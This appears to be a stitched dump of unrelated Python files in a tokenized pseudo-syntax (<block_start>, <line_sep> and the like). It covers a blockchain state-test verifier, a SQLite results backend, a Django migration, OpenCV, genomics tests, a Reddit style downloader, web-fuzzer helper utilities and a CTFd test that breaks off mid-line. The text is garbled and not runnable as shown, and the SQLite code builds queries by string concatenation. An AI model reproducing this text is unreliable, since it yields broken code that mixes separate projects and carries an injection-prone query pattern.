use_mock_evm_account=<not>is_qkc_state )<if_stmt>"overrides"<in>env<block_start><if_stmt>"specialContractTimestamp"<in>env["overrides"]<block_start><for_stmt>overrides env["overrides"]["specialContractTimestamp"]<block_start>configure_special_contract_ts(specials bytes.fromhex(overrides["address"]) overrides["timestamp"] )<block_end><block_end><block_end>seen_token_ids=set()<line_sep># Fill up pre
<for_stmt>address,h list(pre.items())<block_start><assert_stmt>len(address)<in>(40 42)<line_sep>address=decode_hex(remove_0x_head(address))<line_sep>state.set_nonce(address parse_int_or_hex(h["nonce"]))<if_stmt>is_qkc_state<and>"balances"<in>h# In QuarkChain state tests, can either specify balance map or single balance
<block_start><for_stmt>token_id,balance h["balances"].items()<block_start>parsed_token_id=parse_int_or_hex(token_id)<line_sep>state.set_token_balance(address parsed_token_id parse_int_or_hex(balance))<line_sep>seen_token_ids.add(parsed_token_id)<block_end><block_end><else_stmt><block_start>state.set_balance(address parse_int_or_hex(h["balance"]))<block_end>state.set_code(address decode_hex(remove_0x_head(h["code"])))<for_stmt>k,v h["storage"].items()<block_start>state.set_storage_data(address big_endian_to_int(decode_hex(k[2:])) big_endian_to_int(decode_hex(v[2:])) )<block_end><block_end># Update allowed token IDs
<if_stmt>seen_token_ids<block_start>state.qkc_config._allowed_token_ids=seen_token_ids<block_end>state.commit(allow_empties=<true>)<line_sep><return>state<block_end><class_stmt>EnvNotFoundException(Exception)<block_start><pass><block_end><def_stmt>verify_state_test test<block_start>print("Verifying state test")<if_stmt>"env"<not><in>test<block_start><raise>EnvNotFoundException("Env not found")<block_end>_state=init_state(test["env"] test["pre"] test["qkcstate"] qkc_env=test["qkc"])<for_stmt>config_name,results test["post"].items()# Old protocol versions may not be supported
<block_start><if_stmt>config_name<not><in>network_to_test<block_start><continue><block_end>print("Testing for %s"%config_name)<for_stmt>result results<block_start>data=test["transaction"]["data"][result["indexes"]["data"]]<if_stmt>len(data)<g>2000<block_start>data="data<%d>"%(len(data)<floordiv>2-1)<block_end>print("Checking for values: g %d v %d d %s (indexes g %d v %d d %d)"%(parse_int_or_hex(test["transaction"]["gasLimit"][result["indexes"]["gas"]]) parse_int_or_hex(test["transaction"]["value"][result["indexes"]["value"]]) data result["indexes"]["gas"] result["indexes"]["value"] result["indexes"]["data"] ))<line_sep>computed=compute_state_test_unit(_state test["transaction"] result["indexes"] evm_config test["qkcstate"] qkc_env=test["qkc"] )<if_stmt>computed["hash"][-64:]<ne>result["hash"][-64:]<block_start><for_stmt>k computed["diff"]<block_start>print(k computed["diff"][k] file=sys.stderr)<block_end>print(test["filename"] test["testname"] file=sys.stderr)<line_sep><raise>Exception("Hash mismatch, computed: %s, supplied: %s"%(computed["hash"] result["hash"]))<block_end><else_stmt><block_start><for_stmt>k computed["diff"]<block_start>print(k computed["diff"][k])<block_end>print("Hash matched!: %s"%computed["hash"])<block_end><block_end><block_end><return><true><block_end> |
<import_from_future_stmt> absolute_import<import_from_future_stmt> division<import_from_future_stmt> print_function<import_from_future_stmt> unicode_literals<import_stmt>numpy<as>np<import_stmt>sqlite3<import_stmt>sys<import_from_stmt>.base database<if_stmt>sys.version_info[0]<ge>3<block_start>unicode=str<block_end><class_stmt>PickalableSWIG<block_start><def_stmt>__setstate__ self state<block_start>self.__init__(*state['args'])<block_end><def_stmt>__getstate__ self<block_start><return>{'args':self.args}<block_end><block_end><class_stmt>PickalableSQL3Connect(sqlite3.Connection PickalableSWIG)<block_start><def_stmt>__init__ self *args **kwargs<block_start>self.args=args<line_sep>sqlite3.Connection.__init__(self *args **kwargs)<block_end><block_end><class_stmt>PickalableSQL3Cursor(sqlite3.Cursor PickalableSWIG)<block_start><def_stmt>__init__ self *args **kwargs<block_start>self.args=args<line_sep>sqlite3.Cursor.__init__(self *args **kwargs)<block_end><block_end><class_stmt>sql(database)<block_start>"""
This class saves the process in the working storage. It can be used if
safety matters.
"""<def_stmt>__init__ self *args **kwargs<block_start><import_stmt>os<line_sep># init base class
super(sql self).__init__(*args **kwargs)<line_sep># Create a open file, which needs to be closed after the sampling
<try_stmt><block_start>os.remove(self.dbname+'.db')<block_end><except_stmt><block_start><pass><block_end>self.db=PickalableSQL3Connect(self.dbname+'.db')<line_sep>self.db_cursor=PickalableSQL3Cursor(self.db)<line_sep># Create Table
# self.db_cursor.execute('''CREATE TABLE IF NOT EXISTS '''+self.dbname+'''
# (like1 real, parx real, pary real, simulation1 real, chain int)''')
self.db_cursor.execute('''CREATE TABLE IF NOT EXISTS '''+self.dbname+'''
('''+' real ,'.join(self.header)+''')''')<block_end><def_stmt>save self objectivefunction parameterlist simulations=<none> chains=1<block_start>coll=(self.dim_dict['like'](objectivefunction)+self.dim_dict['par'](parameterlist)+self.dim_dict['simulation'](simulations)+[chains])<line_sep># Apply rounding of floats
coll=map(self.db_precision coll)<line_sep>self.db_cursor.execute("INSERT INTO "+self.dbname+" VALUES ("+'"'+str('","'.join(map(str coll)))+'"'+")")<line_sep>self.db.commit()<block_end><def_stmt>finalize self<block_start>self.db.close()<block_end><def_stmt>getdata self<block_start>self.db=PickalableSQL3Connect(self.dbname+'.db')<line_sep>self.db_cursor=PickalableSQL3Cursor(self.db)<if_stmt>sys.version_info[0]<ge>3<block_start>headers=[(row[1] "<f8")<for>row self.db_cursor.execute("PRAGMA table_info("+self.dbname+");")]<block_end><else_stmt># Workaround for python2
<block_start>headers=[(unicode(row[1]).encode("ascii") unicode("<f8").encode("ascii"))<for>row self.db_cursor.execute("PRAGMA table_info("+self.dbname+");")]<block_end>back=np.array([row<for>row self.db_cursor.execute('SELECT * FROM '+self.dbname)] dtype=headers)<line_sep>self.db.close()<line_sep><return>back<block_end><block_end> |
# Generated by Django 2.0.9 on 2019-03-18 20:21
<import_from_stmt>django.conf settings<import_from_stmt>django.db migrations models<import_stmt>django.db.models.deletion<import_stmt>markupfield.fields<class_stmt>Migration(migrations.Migration)<block_start>initial=<true><line_sep>dependencies=[migrations.swappable_dependency(settings.AUTH_USER_MODEL)]<line_sep>operations=[migrations.CreateModel(name="Election" fields=[("id" models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name="ID" ) ) ("name" models.CharField(max_length=100)) ("date" models.DateField()) ("nominations_open_at" models.DateTimeField(blank=<true> null=<true>)) ("nominations_close_at" models.DateTimeField(blank=<true> null=<true>)) ("slug" models.SlugField(blank=<true> max_length=255 null=<true>)) ] options={"ordering":["-date"]} ) migrations.CreateModel(name="Nomination" fields=[("id" models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name="ID" ) ) ("name" models.CharField(max_length=1024 null=<true>)) ("email" models.CharField(max_length=1024 null=<true>)) ("previous_board_service" models.CharField(max_length=1024 null=<true>) ) ("employer" models.CharField(max_length=1024 null=<true>)) ("other_affiliations" models.CharField(blank=<true> max_length=2048 null=<true>) ) ("nomination_statement" markupfield.fields.MarkupField(null=<true> rendered_field=<true>) ) ("nomination_statement_markup_type" models.CharField(choices=[("" "--") ("html" "HTML") ("plain" "Plain") ("markdown" "Markdown") ("restructuredtext" "Restructured Text") ] default="markdown" editable=<false> max_length=30 ) ) ("_nomination_statement_rendered" models.TextField(editable=<false> null=<true>) ) ("accepted" models.BooleanField(default=<false>)) ("approved" models.BooleanField(default=<false>)) ("election" models.ForeignKey(on_delete=django.db.models.deletion.CASCADE to="nominations.Election" ) ) ("nominator" models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="nominations_made" to=settings.AUTH_USER_MODEL ) ) ] ) migrations.CreateModel(name="Nominee" fields=[("id" models.AutoField(auto_created=<true> primary_key=<true> serialize=<false> verbose_name="ID" ) ) ("accepted" models.BooleanField(default=<false>)) ("approved" models.BooleanField(default=<false>)) ("slug" models.SlugField(blank=<true> max_length=255 null=<true>)) ("election" models.ForeignKey(on_delete=django.db.models.deletion.CASCADE related_name="nominees" to="nominations.Election" ) ) ("user" models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name="nominations_recieved" to=settings.AUTH_USER_MODEL ) ) ] ) migrations.AddField(model_name="nomination" name="nominee" field=models.ForeignKey(blank=<true> null=<true> on_delete=django.db.models.deletion.CASCADE related_name="nominations" to="nominations.Nominee" ) ) migrations.AlterUniqueTogether(name="nominee" unique_together={("user" "election")}) ]<block_end> |
# -*-coding:utf8-*-#
__author__='play4fun'<line_sep>"""
create time:15-11-8 ไธๅ4:44
็ปๅถ2D็ดๆนๅพ
"""<import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>matplotlib pyplot<as>plt<line_sep>img=cv2.imread('../data/home.jpg')<line_sep># cv2.imshow("src", img)
hsv=cv2.cvtColor(img cv2.COLOR_BGR2HSV)<line_sep>hist=cv2.calcHist([hsv] [0 1] <none> [180 256] [0 180 0 256])<line_sep>plt.imshow(hist interpolation='nearest')<line_sep>plt.show()<line_sep> |
<def_stmt>extractExpandablefemaleBlogspotCom item<block_start>'''
DISABLED
Parser for 'expandablefemale.blogspot.com'
'''<line_sep><return><none><block_end> |
<import_stmt>tqdm<import_stmt>torch<import_from_stmt>lav.lav_privileged LAV<import_from_stmt>lav.utils.datasets get_data_loader<import_from_stmt>lav.utils.logger Logger<def_stmt>main args<block_start>dmd=LAV(args)<line_sep>data_loader=get_data_loader('bev' args)<line_sep>logger=Logger('lav_bev' args)<line_sep>save_dir=logger.save_dir<line_sep>torch.manual_seed(args.seed)<line_sep># logger.watch_model(dmd.uniplanner)
global_it=0<for_stmt>epoch range(args.num_epoch)<block_start><for_stmt>data tqdm.tqdm(data_loader desc=f'Epoch {epoch}')<block_start>opt_info=dmd.train_bev(*data)<if_stmt>global_it%args.num_per_log<eq>0<block_start>logger.log_bev_info(global_it opt_info)<block_end>global_it<augadd>1<block_end>dmd.bev_scheduler.step()<if_stmt>(epoch+1)%args.num_per_save<eq>0<block_start>bev_path=f'{save_dir}/bev_{epoch+1}.th'<line_sep>torch.save(dmd.state_dict('bev') bev_path)<line_sep>print(f'save to {bev_path}')<line_sep>logger.save([bev_path])<block_end><block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start><import_stmt>argparse<line_sep>parser=argparse.ArgumentParser()<line_sep>parser.add_argument('--config-path' default='config.yaml')<line_sep>parser.add_argument('--device' default='cuda' choices=['cuda' 'cpu'])<line_sep># Training misc
parser.add_argument('--num-epoch' type=int default=160)<line_sep>parser.add_argument('--num-per-log' type=int default=100 help='log per iter')<line_sep>parser.add_argument('--num-per-save' type=int default=10 help='save per epoch')<line_sep>parser.add_argument('--batch-size' type=int default=512)<line_sep>parser.add_argument('--lr' type=float default=3e-4)<line_sep>parser.add_argument('--num-workers' type=int default=16)<line_sep># Reproducibility (still not fully determinstic due to CUDA/CuDNN)
parser.add_argument('--seed' type=int default=2021)<line_sep>args=parser.parse_args()<line_sep>main(args)<block_end> |
<import_stmt>os<import_stmt>unittest<import_stmt>numpy<as>np<import_from_stmt>selene_sdk.targets GenomicFeatures<import_from_stmt>selene_sdk.targets.genomic_features _any_positive_rows _is_positive_row _get_feature_data<class_stmt>TestGenomicFeatures(unittest.TestCase)<block_start><def_stmt>setUp self<block_start>self.features=["CTCF" "eGFP-FOS" "GABP" "Pbx3" "Pol2" "TBP"]<line_sep>self.feature_index_map={"CTCF":0 "eGFP-FOS":1 "GABP":2 "Pbx3":3 "Pol2":4 "TBP":5}<line_sep>self.n_features=len(self.features)<line_sep># CTCF only, between 16110 and 16239
self.rows_example1=[["1" "16110" "16190" "CTCF"] # len 70
["1" "16128" "16158" "CTCF"] # len 30
["1" "16149" "16239" "CTCF"]]<line_sep># len 90
# CTCF only, between 91128 and 91358
self.rows_example2=[["2" "91128" "91358" "CTCF"] # len 200
["2" "91130" "91239" "CTCF"] # len 109
["2" "91156" "91310" "CTCF"]]<line_sep># len 154
# multiple features, between 8533 and 9049
self.rows_example3=[["chr3" "8533" "8817" "eGFP-FOS"] # len 284
["chr3" "8541" "8651" "GABP"] # len 110
["chr3" "8574" "8629" "Pol2"] # len 145
["chr3" "8619" "9049" "CTCF"] # len 430
["chr3" "8620" "8680" "TBP"] # len 60
["chr3" "8645" "8720" "TBP"]]<block_end># len 75
<def_stmt>get_feature_rows self chrom start end<block_start>"""This function disregards (`start`, `end`) input
"""<if_stmt>chrom<is><none><block_start><return><none><block_end><if_stmt>chrom<eq>"1"<block_start><return>self.rows_example1<block_end><elif_stmt>chrom<eq>"2"<block_start><return>self.rows_example2<block_end><elif_stmt>chrom<eq>"3"<block_start><return>self.rows_example3<block_end><else_stmt><block_start><return>[]<block_end><block_end>############################################
# Correctness tests for `_is_positive_row`
############################################
<def_stmt>test__is_positive_row_false self<block_start>query_start,query_end=(16150 16351)# len 201
feat_start,feat_end=(16110 16190)# len 80
threshold=0.50<line_sep>self.assertFalse(_is_positive_row(query_start query_end feat_start feat_end threshold))<block_end><def_stmt>test__is_positive_row_true_eq_threshold self<block_start>query_start,query_end=(16110 16309)# len 199
feat_start,feat_end=(16110 16190)# len 80
threshold=0.40<line_sep>self.assertTrue(_is_positive_row(query_start query_end feat_start feat_end threshold))<block_end><def_stmt>test__is_positive_row_true_gt_threshold self<block_start>query_start,query_end=(16110 16311)# len 201
feat_start,feat_end=(16110 16290)# len 170
threshold=0.80<line_sep>self.assertTrue(_is_positive_row(query_start query_end feat_start feat_end threshold))<block_end>############################################
# Correctness tests for `_any_positive_rows`
############################################
<def_stmt>test__any_positive_rows_none_rows self<block_start>rows=<none><line_sep>query_start,query_end=(10 100)<line_sep>threshold={k:0.50<for>k self.features}<line_sep>self.assertFalse(_any_positive_rows(rows query_start query_end threshold))<block_end><def_stmt>test__any_positive_rows_empty_rows self<block_start>rows=[]<line_sep>query_start,query_end=(10 100)<line_sep>threshold={k:0.50<for>k self.features}<line_sep>self.assertFalse(_any_positive_rows(rows query_start query_end threshold))<block_end><def_stmt>test__any_positive_rows_false self<block_start>rows=self.rows_example1<line_sep>query_start,query_end=(16150 16351)<line_sep>threshold={k:0.50<for>k self.features}<line_sep>self.assertFalse(_any_positive_rows(rows query_start query_end threshold))<block_end><def_stmt>test__any_positive_rows_true self<block_start>rows=self.rows_example1<line_sep>query_start,query_end=(16150 16351)<line_sep>threshold={k:0.40<for>k self.features}<line_sep>self.assertTrue(_any_positive_rows(rows query_start query_end threshold))<block_end>############################################
# Correctness tests for `_get_feature_data`
############################################
<def_stmt>test__get_feature_data_none_rows self<block_start>query_chrom,query_start,query_end=(<none> 10 211)<line_sep>threshold=np.array([0.50]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[0 0 0 0 0 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_empty_rows self<block_start>query_chrom,query_start,query_end=("7" 10 211)<line_sep>threshold=np.array([0.50]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[0 0 0 0 0 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_single_feat_positive self<block_start>query_chrom,query_start,query_end=("1" 16100 16350)<line_sep>threshold=np.array([0.50]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[1 0 0 0 0 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_no_feat_positive self<block_start>query_chrom,query_start,query_end=("2" 91027 91228)<line_sep>threshold=np.array([0.51]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[0 0 0 0 0 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_multiple_feats_positive self<block_start>query_chrom,query_start,query_end=("3" 8619 8719)<line_sep>threshold=np.array([0.50]<times>self.n_features).astype(np.float32)<line_sep>expected_encoding=[1 1 0 0 0 1]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end><def_stmt>test__get_feature_data_different_thresholds self<block_start>query_chrom,query_start,query_end=("3" 8619 8719)<line_sep>threshold=np.array([0.50 0.0 0.0 0.0 0.0 1.0]).astype(np.float32)<line_sep>expected_encoding=[1 1 1 0 1 0]<line_sep>observed_encoding=_get_feature_data(query_chrom query_start query_end threshold self.feature_index_map self.get_feature_rows)<line_sep>self.assertSequenceEqual(observed_encoding.tolist() expected_encoding)<block_end>############################################
# GenomicFeatures integration tests
############################################
<def_stmt>test_GenomicFeatures_single_threshold self<block_start>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features 0.50)<line_sep>self.assertDictEqual(query_features.feature_thresholds {k:0.50<for>k self.features})<line_sep>self.assertSequenceEqual(query_features._feature_thresholds_vec.tolist() [0.50]<times>self.n_features)<block_end><def_stmt>test_GenomicFeatures_diff_thresholds self<block_start>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features {"default":0.50 "CTCF":0.0 "Pol2":0.15})<line_sep>self.assertEqual(query_features.feature_thresholds {"CTCF":0.0 "eGFP-FOS":0.50 "GABP":0.50 "Pbx3":0.50 "Pol2":0.15 "TBP":0.50})<line_sep>np.testing.assert_almost_equal(query_features._feature_thresholds_vec.tolist() [0.0 0.50 0.50 0.50 0.15 0.50])<block_end><def_stmt>test_GenomicFeatures_lambda_thresholds self<block_start><def_stmt>_feature_thresholds f<block_start><if_stmt>f<eq>"Pbx3"<block_start><return>0.30<block_end><elif_stmt>f<eq>"CTCF"<block_start><return>0.40<block_end><else_stmt><block_start><return>0.50<block_end><block_end>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features _feature_thresholds)<line_sep>self.assertEqual(query_features.feature_thresholds {"CTCF":0.40 "eGFP-FOS":0.50 "GABP":0.50 "Pbx3":0.30 "Pol2":0.50 "TBP":0.50})<line_sep>np.testing.assert_almost_equal(query_features._feature_thresholds_vec.tolist() [0.40 0.50 0.50 0.30 0.50 0.50])<block_end><def_stmt>test_GenomicFeatures_no_thresholds__get_feature_data self<block_start>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features feature_thresholds=<none>)<line_sep>expected_feature_data=np.zeros(self.n_features)<line_sep>expected_feature_data[self.feature_index_map['CTCF']]=1.<line_sep># NOTE: "1 16110 16390 CTCF" is the first line in the test data.
actual_feature_data=query_features.get_feature_data('1' 16110 16390)<line_sep>np.testing.assert_array_almost_equal(actual_feature_data expected_feature_data)<block_end><def_stmt>test_GenomicFeatures_0_5_threshold__get_feature_data self<block_start>data_path=os.path.join("selene_sdk" "targets" "tests" "files" "sorted_aggregate.bed.gz")<line_sep>query_features=GenomicFeatures(data_path self.features feature_thresholds=0.5)<line_sep># NOTE: "1 16110 16390 CTCF" is the first line in the test data.
# Overlap is less than a threshold:
np.testing.assert_array_almost_equal(query_features.get_feature_data('1' 16000 17000) np.zeros(self.n_features))<line_sep># Overlap is greater than a threshold:
expected_feature_data=np.zeros(self.n_features)<line_sep>expected_feature_data[self.feature_index_map['CTCF']]=1.<line_sep>np.testing.assert_array_almost_equal(query_features.get_feature_data('1' 16000 16500) expected_feature_data)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>unittest.main()<block_end> |
<import_stmt>os<import_stmt>requests<import_from_stmt>. common<import_from_stmt>. tsdb<line_sep>session=requests.Session()<def_stmt>get_styles subreddit<block_start>(database subreddit)=tsdb.TSDB.for_subreddit(subreddit fix_name=<true>)<line_sep>print('Getting styles for /r/%s'%subreddit)<line_sep>subreddit=common.r.subreddit(subreddit)<line_sep>styles=subreddit.stylesheet()<line_sep>database.styles_dir.makedirs(exist_ok=<true>)<line_sep>stylesheet_filepath=database.styles_dir.with_child('stylesheet.css')<line_sep>print('Downloading %s'%stylesheet_filepath.relative_path)<with_stmt>stylesheet_filepath.open('w' encoding='utf-8')<as>stylesheet<block_start>stylesheet.write(styles.stylesheet)<block_end><for_stmt>image styles.images<block_start>image_basename=image['name']+'.'+image['url'].split('.')[-1]<line_sep>image_filepath=database.styles_dir.with_child(image_basename)<line_sep>print('Downloading %s'%image_filepath.relative_path)<with_stmt>image_filepath.open('wb')<as>image_file<block_start>response=session.get(image['url'])<line_sep>image_file.write(response.content)<block_end><block_end><block_end><def_stmt>get_styles_argparse args<block_start><return>get_styles(args.subreddit)<block_end> |
<import_from_stmt>django.test TestCase<import_from_stmt>corehq toggles<import_from_stmt>corehq.motech.dhis2.tasks send_datasets_for_all_domains<class_stmt>TestSendDatasetsForAllDomains(TestCase)<block_start>domain_name='does-not-exist'<def_stmt>setUp self<block_start>toggles.DHIS2_INTEGRATION.set(self.domain_name enabled=<true> namespace=toggles.NAMESPACE_DOMAIN)<block_end><def_stmt>tearDown self<block_start>toggles.DHIS2_INTEGRATION.set(self.domain_name enabled=<false> namespace=toggles.NAMESPACE_DOMAIN)<block_end><def_stmt>test_check_domain_exists self<block_start>"""
send_datasets_for_all_domains() should not raise an AttributeError
if a domain does not exist
"""<line_sep>send_datasets_for_all_domains()<block_end><block_end> |
# generated by datamodel-codegen:
# filename: test.json
# timestamp: 2019-07-26T00:00:00+00:00
<import_from_future_stmt> annotations<import_from_stmt>pydantic BaseModel Field<class_stmt>Second(BaseModel)<block_start>__root__:str<block_end><class_stmt>First(BaseModel)<block_start>__root__:Second<block_end><class_stmt>Model(BaseModel)<block_start>test_id:str=Field(<ellipsis> description='test ID')<line_sep>test_ip:First<block_end> |
"""Tests for web_utils."""<import_from_stmt>django.test SimpleTestCase<import_from_stmt>.. web_utils<class_stmt>TestCase(SimpleTestCase)<block_start>"""Test functions."""<def_stmt>test_size2integer self<block_start>self.assertEqual(web_utils.size2integer("1024") 1024)<line_sep># Convert to bytes
self.assertEqual(web_utils.size2integer("1K") 1024)<line_sep>self.assertEqual(web_utils.size2integer("1M") 1048576)<line_sep>self.assertEqual(web_utils.size2integer("1G") 1073741824)<line_sep># Convert to megabytes
self.assertEqual(web_utils.size2integer("1K" output_unit="MB") 0)<line_sep>self.assertEqual(web_utils.size2integer("1M" output_unit="MB") 1)<line_sep>self.assertEqual(web_utils.size2integer("1G" output_unit="MB") 1024)<line_sep># Unsupported unit
<with_stmt>self.assertRaises(ValueError)<block_start>web_utils.size2integer("1K" output_unit="GB")<block_end><block_end><block_end> |
# Copyright (c) 2020 - present <NAME> <https://github.com/VitorOriel>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
<import_from_stmt>.consts FUZZING_MARK<import_from_stmt>typing List Tuple Union<def_stmt>getIndexesToParse content:str searchFor:str=FUZZING_MARK<arrow>List[int]<block_start>"""Gets the indexes of the searched substring into a string content
@type content: str
@param content: The parameter content
@type searchFor: str
@param searchFor: The substring to be searched indexes on the given content
@returns List[int]: The positions indexes of the searched substring
"""<line_sep><return>[i<for>i,char enumerate(content)<if>char<eq>searchFor]<block_end><def_stmt>splitStrToList string:str separator:str=',' ignores:str='\\'<arrow>List[str]<block_start>"""Split the given string into a list, using a separator
@type string: str
@param string: The string to be splited
@type separator: str
@param separator: A separator to split the string
@type ignores: str
@param ignores: A string to ignores the separator
@returns List[str]: The splited string
"""<if_stmt>string<block_start><if_stmt>f'{ignores}{separator}'<in>string<block_start>final=[]<line_sep>buffer=''<for_stmt>substr string.split(separator)<block_start><if_stmt>substr[-1]<eq>ignores<block_start>buffer<augadd>substr[:-1]+separator<block_end><else_stmt><block_start>final.extend([buffer+substr])<line_sep>buffer=''<block_end><block_end><return>final<block_end><return>string.split(separator)<block_end><return>[]<block_end><def_stmt>stringfyList oneList:list<arrow>str<block_start>"""Stringfies a list
@type oneList: list
@param oneList: A list to be stringed
@returns str: The stringed list
"""<line_sep>output=''<for_stmt>i range(len(oneList)-1)<block_start>output<augadd>f"{oneList[i]},"<block_end>output<augadd>oneList[-1]<line_sep><return>output<block_end><def_stmt>getHumanLength length:int<arrow>Tuple[Union[int float] str]<block_start>"""Get the human readable length from the result
@type length: int
@param length: The length of the response body
@returns Tuple[int|float, str]: The tuple with new length and the readable order
"""<for_stmt>order ["B " "KB" "MB" "GB"]<block_start><if_stmt>length<l>1024<block_start><return>(length order)<block_end>length<augdiv>1024<block_end><return>(length "TB")<block_end><def_stmt>checkRangeList content:str<arrow>List[Union[int str]]<block_start>"""Checks if the given content has a range list,
and make a list of the range specified
@type content: str
@param content: The string content to check for range
@returns List[int|str]: The list with the compiled content
"""<def_stmt>getNumberRange left:str right:str<arrow>List[int]<block_start>"""Get the number range list
@type left: str
@param left: The left string of the division mark
@type right: str
@param right: The right string of the division mark
@returns List[int]: The list with the range
"""<line_sep>isNumber=<true><line_sep>i=len(left)<while_stmt>isNumber<and>i<g>0<block_start><try_stmt><block_start>int(left[i-1])<block_end><except_stmt><block_start>isNumber=<false><block_end><else_stmt><block_start>i<augsub>1<block_end><block_end>leftDigit,leftStr=int(left[i:]) left[:i]<line_sep>isNumber=<true><line_sep>i=0<while_stmt>isNumber<and>i<l>(len(right)-1)<block_start><try_stmt><block_start>int(right[i+1])<block_end><except_stmt>Exception<as>e<block_start>isNumber=<false><block_end><else_stmt><block_start>i<augadd>1<block_end><block_end>rightDigit,rightStr=int(right[:(i+1)]) right[(i+1):]<line_sep>compiledList=[]<if_stmt>leftDigit<l>rightDigit<block_start><while_stmt>leftDigit<le>rightDigit<block_start>compiledList.append(f"{leftStr}{str(leftDigit)}{rightStr}")<line_sep>leftDigit<augadd>1<block_end><block_end><else_stmt><block_start><while_stmt>rightDigit<le>leftDigit<block_start>compiledList.append(f"{leftStr}{str(leftDigit)}{rightStr}")<line_sep>leftDigit<augsub>1<block_end><block_end><return>compiledList<block_end><def_stmt>getLetterRange left:str right:str<arrow>List[str]<block_start>"""Get the alphabet range list [a-z] [A-Z] [z-a] [Z-A]
@type left: str
@param left: The left string of the division mark
@type right: str
@param right: The right string of the division mark
@returns List[str]: The list with the range
"""<line_sep>leftDigit,leftStr=left[-1] left[:-1]<line_sep>rightDigit,rightStr=right[0] right[1:]<line_sep>compiledList=[]<if_stmt>ord(leftDigit)<le>ord(rightDigit)<block_start>orderLeftDigit=ord(leftDigit)<line_sep>orderRightDigit=ord(rightDigit)<while_stmt>orderLeftDigit<le>orderRightDigit<block_start>compiledList.append(f"{leftStr}{chr(orderLeftDigit)}{rightStr}")<line_sep>orderLeftDigit<augadd>1<block_end><block_end><else_stmt><block_start>orderLeftDigit=ord(leftDigit)<line_sep>orderRightDigit=ord(rightDigit)<while_stmt>orderLeftDigit<ge>orderRightDigit<block_start>compiledList.append(f"{leftStr}{chr(orderLeftDigit)}{rightStr}")<line_sep>orderLeftDigit<augsub>1<block_end><block_end><return>compiledList<block_end><if_stmt>'\-'<in>content<block_start>content=content.replace('\-' '-')<block_end><elif_stmt>'-'<in>content<block_start>left,right=content.split('-' 1)<try_stmt># Checks if the left and right digits from the mark are integers
<block_start>int(left[-1])<line_sep>int(right[0])<line_sep><return>getNumberRange(left right)<block_end><except_stmt><block_start><return>getLetterRange(left right)<block_end><block_end><return>[content]<block_end> |
<import_from_stmt>collections defaultdict<import_from_stmt>queue Queue<import_from_stmt>unittest.mock patch<import_from_stmt>redis.exceptions ConnectionError<import_from_stmt>CTFd.config TestingConfig<import_from_stmt>CTFd.utils.events EventManager RedisEventManager ServerSentEvent<import_from_stmt>tests.helpers create_ctfd destroy_ctfd login_as_user register_user<def_stmt>test_event_manager_installed <block_start>"""Test that EventManager is installed on the Flask app"""<line_sep>app=create_ctfd()<assert_stmt>type(app.events_manager)<eq>EventManager<line_sep>destroy_ctfd(app)<block_end><def_stmt>test_event_manager_subscription <block_start>"""Test that EventManager subscribing works"""<with_stmt>patch.object(Queue "get")<as>fake_queue<block_start>saved_data={"user_id":<none> "title":"asdf" "content":"asdf" "team_id":<none> "user":<none> "team":<none> "date":"2019-01-28T01:20:46.017649+00:00" "id":10 }<line_sep>saved_event={"type":"notification" "data":saved_data}<line_sep>fake_queue.return_value=saved_event<line_sep>event_manager=EventManager()<line_sep>events=event_manager.subscribe()<line_sep>message=next(events)<assert_stmt>isinstance(message ServerSentEvent)<assert_stmt>message.to_dict()<eq>{"data":"" 